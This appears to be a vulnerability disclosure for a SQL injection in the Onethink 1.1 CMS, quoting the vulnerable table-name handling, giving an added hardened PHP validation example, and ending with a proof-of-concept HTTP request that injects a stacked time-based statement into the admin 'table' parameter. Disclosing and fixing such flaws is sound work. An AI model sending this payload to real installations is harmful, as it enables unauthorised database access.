A SQL injection vulnerability in Onethink 1.1
In https://github.com/liu21st/onethink/blob/f705308bc24611af650e6830e3be2a07dd8bb823/wwwroot/Application/Admin/Controller/ModelController.class.php#L148, $table is controlled by users: it is read straight from the POST body and passed on without validation.
$table = I('post.table');                 // user-controlled: raw POST parameter "table"
empty($table) && $this->error('请选择要生成的数据表!');   // only checks that it is non-empty
$res = D('Model')->generate($table,I('post.name'),I('post.title'));   // passed to the sink below
In https://github.com/liu21st/onethink/blob/f705308bc24611af650e6830e3be2a07dd8bb823/wwwroot/Application/Admin/Model/ModelModel.class.php#L122, $table is concatenated into the SQL string directly, with no identifier validation or quoting.
public function generate($table,$name='',$title=''){
// ......
$fields = M()->query('SHOW FULL COLUMNS FROM '.$table);   // sink: $table spliced into the query as-is
//......
}
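As an added example (not code from Onethink or ThinkPHP), this is how the sink above can be hardened in PHP. A table name is an SQL identifier, so a prepared-statement placeholder cannot carry it; the fix is to accept only a name that matches a strict identifier pattern and is an exact member of the tables the application already knows about, then backtick-quote it. The function names safeTableIdentifier and buildShowColumnsQuery and the $knownTables list are hypothetical; in the real application the list would come from a trusted source such as M()->query('SHOW TABLES') on the application's own connection, which is an assumption about the caller and is not shown here.

```php
<?php
// Added example, not Onethink/ThinkPHP project code.
// Hardened handling of a user-supplied table name before it reaches
// 'SHOW FULL COLUMNS FROM ' . $table.

/**
 * Return the backtick-quoted identifier for $table, or null if $table is not
 * a plain identifier or is not an exact member of $knownTables.
 *
 * $knownTables is assumed to be trusted (e.g. the result of SHOW TABLES on
 * the application's own connection; hypothetical caller, not shown here).
 */
function safeTableIdentifier(string $table, array $knownTables): ?string
{
    // First gate: only [A-Za-z0-9_], at most 64 chars (MySQL's identifier limit).
    // This keeps ';', quotes, spaces and comment markers away from the SQL string.
    if (!preg_match('/^[A-Za-z0-9_]{1,64}$/', $table)) {
        return null;
    }
    // Second gate: exact, strict membership in the known-table list.
    if (!in_array($table, $knownTables, true)) {
        return null;
    }
    // The regex guarantees no backtick is present, so plain quoting is safe.
    return '`' . $table . '`';
}

/**
 * Build the column-listing query the vulnerable generate() ran, but only for a
 * validated identifier. Returns null when the name is rejected so the caller
 * can report an error instead of running anything.
 */
function buildShowColumnsQuery(string $table, array $knownTables): ?string
{
    $ident = safeTableIdentifier($table, $knownTables);
    return $ident === null ? null : 'SHOW FULL COLUMNS FROM ' . $ident;
}

// Constructed sample of known tables for this demo.
$knownTables = ['onethink_action', 'onethink_model', 'onethink_user'];

// Constructed inputs: one legitimate name, the payload shape from the report,
// and two malformed variants.
$inputs = [
    'onethink_action',                  // legitimate request
    'onethink_action;select sleep(60)', // stacked statement as in the PoC
    'onethink_action`',                 // stray quote character
    'not_a_known_table',                // well-formed but not in the list
];

foreach ($inputs as $input) {
    $sql = buildShowColumnsQuery($input, $knownTables);
    printf("%-36s => %s\n", var_export($input, true), $sql ?? 'REJECTED');
}
```

Only the first input produces a query; the other three are rejected before any SQL is built. Checking membership against the live table list rather than the regex alone also blocks well-formed names for tables the caller should not be enumerating.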
PoC (time-based; the table parameter carries a stacked statement):
POST /admin.php?s=/Model/generate.html HTTP/1.1
Host: www.myonethink.com
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 67
Origin: http://www.myonethink.com
DNT: 1
Sec-GPC: 1
Connection: close
Referer: http://www.myonethink.com/admin.php?s=/Model/generate.html
Cookie: PHPSESSID=l7mt7mtb5sr16frdpv6fqibith; onethink_admin___forward__=%2Fadmin.php%3Fs%3D%2FModel%2Findex.html
table=onethink_action;select%20sleep(60)&name=test2&title=test2&id=